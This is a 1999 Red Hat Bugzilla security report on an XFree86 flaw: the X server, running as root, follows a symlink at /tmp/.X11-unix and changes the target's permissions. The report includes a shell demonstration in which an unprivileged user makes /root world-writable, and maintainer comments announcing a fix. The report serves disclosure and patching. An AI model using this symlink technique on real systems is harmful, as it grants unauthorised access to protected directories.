Bug 1816 - XFree86 chmods directories symlinked from /tmp/.X11-unix
XFree86 chmods directories symlinked from /tmp/.X11-unix
Product: Red Hat Linux
Classification: Retired
Component: XFree86 (Show other bugs)
i386 Linux
high Severity medium
: ---
: ---
Assigned To: Preston Brown
: Security
Depends On:
  Show dependency treegraph
Reported: 1999-03-26 11:04 EST by Bourne, Jim
Modified: 2008-05-01 11:37 EDT (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 1999-03-30 16:01:00 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description Bourne, Jim 1999-03-26 11:04:29 EST
Following a bugtraq report of NetBSD X11 chmoding /root to
1777 by following a symlink in /tmp I tried it under Linux.

This is an XFree86 bug, and because it sets the permissions
on /tmp/.X11-unix as root, the server will chmod any
directory symlinked from that directory in /tmp.

It has been confirmed on i386 platform but will likely
effect all platforms.

********************** example ********************
bash$ id
uid=543(tester) gid=100(users) groups=100(users)
bash$ pwd
bash$ cd /tmp
bash$ ls -la
total 3
drwxrwxrwt   3 root     root         1024 Mar 25 19:11 .
drwxr-xr-x  18 root     root         1024 Mar 24 10:50 ..
bash$ ls -ld /root
drwx------   5 root     root         1024 Mar 25 19:02 /root
bash$ ln -sf /root .X11-unix
bash$ ls -l .X11-unix
lrwxrwxrwx   1 tester   users           5 Mar 25 19:47
.X11-unix -> /root
bash$ startx
(X output removed)
waiting for X server to shut down

bash$ ls -ld /root
drwxrwxrwt   5 root     root         1024 Mar 25 19:47 /root

******************** end example *************************

I have also submitted this to xfree86@xfree86.org
Comment 1 Preston Brown 1999-03-29 12:21:59 EST
fixed in XFree86- and later.
Comment 2 Preston Brown 1999-03-29 12:23:59 EST
We will be putting out a fix for XFree86 on Red Hat 4.x and 5.x later
today, in addition to the fixed package which exists in RawHide right

Note You need to log in before you can comment on or make changes to this bug.